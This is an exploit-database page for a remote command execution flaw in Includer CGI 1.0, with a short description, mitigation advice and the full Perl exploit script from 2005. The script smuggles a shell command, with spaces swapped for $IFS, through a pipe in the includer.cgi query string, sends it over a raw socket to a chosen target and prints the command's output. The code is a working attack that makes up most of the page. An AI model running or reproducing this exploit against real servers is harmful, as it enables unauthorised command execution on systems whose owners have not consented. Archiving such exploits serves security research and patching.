Includer CGI - exploit.company

vendor:

Includer CGI

by:

Network Security Team - nst.void.ru

7.5

CVSS

HIGH

Remote Command Execution

CWE

Product Name: Includer CGI

Affected Version From: 1

Affected Version To: 1

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Includer CGI <= 1.0 Remote Command Execution

This exploit allows an attacker to execute arbitrary commands on the target system by exploiting a vulnerability in the Includer CGI <= 1.0. The vulnerability is due to the improper use of the 'Open' function. By sending a specially crafted request, an attacker can inject arbitrary commands and execute them on the target system.

Mitigation:

It is recommended to update to the latest version of the Includer CGI to mitigate this vulnerability. Additionally, proper input validation and sanitization should be implemented to prevent command injection attacks.

Source

Exploit-DB raw data:

                                                                                                                                                                                                                                                               #!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0                         #
#                                                          #
# Based on - http://www.milw0rm.com/id.php?id=862 (https://www.exploit-db.com/exploits/862/)          #
#                                                          #
# Info about bug - Stupid use "Open" function.             #
#                                                          #
############################################################
# If you want know more visit our home page at nst.void.ru #
############################################################
use IO::Socket;


if (@ARGV < 3)
{
  print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
  print " Usage: <target> <dir> <cmd>\n\n"; 
  print "   <host> - Host name of taget.\n";
  print "   <dir> - If not in dir type / symbol.\n";
  print "   <cmd> - command for execution.\n\n";
  print " Examples:\n\n";
  print "   incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
  print "   incl_10.pl 127.0.0.1 / \"uname -a\"\n";
  print "   incl_10.pl www.test.com / \"ps auxw\"\n";
  exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
  
print "\n ===[ Info for query ]========================\n";   
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";   

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";                                      
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>"$serv",
                           PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

$flag = 0;

while ($ans = <$s>)

 {
   if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
   if ($flag == 1) { print " $ans"; }
   if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
   
 }

# milw0rm.com [2005-04-08]